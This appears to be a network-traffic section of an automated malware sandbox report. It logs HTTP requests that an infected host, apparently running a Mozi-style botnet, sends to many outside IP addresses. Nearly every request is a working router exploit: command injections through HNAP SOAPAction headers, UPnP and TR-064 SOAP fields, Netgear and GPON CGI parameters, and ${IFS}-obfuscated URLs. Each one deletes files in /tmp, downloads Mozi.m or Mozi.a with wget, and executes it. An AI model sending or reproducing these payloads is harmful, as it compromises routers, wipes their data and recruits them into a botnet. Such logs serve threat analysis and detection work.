                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        40192.168.2.2333740195.102.149.6380
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579363108 CET803OUTPOST /HNAP1/ HTTP/1.0
                                                                        Host: 195.102.149.63:80
                                                                        Content-Type: text/xml; charset="utf-8"
                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        41192.168.2.2337388121.208.165.18552869
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579387903 CET886OUTPOST /picsdesc.xml HTTP/1.1
                                                                        Content-Length: 630
                                                                        Accept-Encoding: gzip, deflate
                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                        Accept: /
                                                                        User-Agent: Hello-World
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        42192.168.2.233579684.207.247.1195555
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579421997 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                                        Host: 127.0.0.1:5555
                                                                        User-Agent: Hello, world
                                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                        Content-Type: text/xml
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        43192.168.2.2343448172.152.38.258443
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579457045 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        44192.168.2.2352382187.208.34.3880
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579476118 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        45192.168.2.2349374204.19.175.14449152
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579511881 CET932OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                                        Host: 204.19.175.144:49152
                                                                        Content-Length: 630
                                                                        Accept-Encoding: gzip, deflate
                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        46192.168.2.2349962125.95.228.2258443
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579525948 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        47192.168.2.2341518162.10.150.728080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579569101 CET120OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        48192.168.2.233643447.244.58.3081
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579582930 CET170OUTGET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        49192.168.2.2354204161.159.158.2518080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579608917 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        50192.168.2.2353898140.49.192.1152869
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579634905 CET886OUTPOST /picsdesc.xml HTTP/1.1
                                                                        Content-Length: 630
                                                                        Accept-Encoding: gzip, deflate
                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                        Accept: /
                                                                        User-Agent: Hello-World
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        51192.168.2.234218424.111.109.1138080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579658985 CET334OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                        Host: 127.0.0.1:8080
                                                                        Connection: keep-alive
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Content-Length: 118
                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        52192.168.2.2340292174.161.22.788443
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579690933 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        53192.168.2.23462521.98.140.4280
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579703093 CET328OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                        Host: 127.0.0.1:80
                                                                        Connection: keep-alive
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Content-Length: 118
                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        54192.168.2.2356896145.217.58.1498080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579727888 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        55192.168.2.2359518199.176.49.449152
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579762936 CET930OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                                        Host: 199.176.49.4:49152
                                                                        Content-Length: 630
                                                                        Accept-Encoding: gzip, deflate
                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        56192.168.2.235449479.72.226.1288080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579790115 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        57192.168.2.235115684.240.86.1605555
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579806089 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                                        Host: 127.0.0.1:5555
                                                                        User-Agent: Hello, world
                                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                        Content-Type: text/xml
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        58192.168.2.2349352189.47.162.685555
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579842091 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                                        Host: 127.0.0.1:5555
                                                                        User-Agent: Hello, world
                                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                        Content-Type: text/xml
                                                                        Content-Length: 640
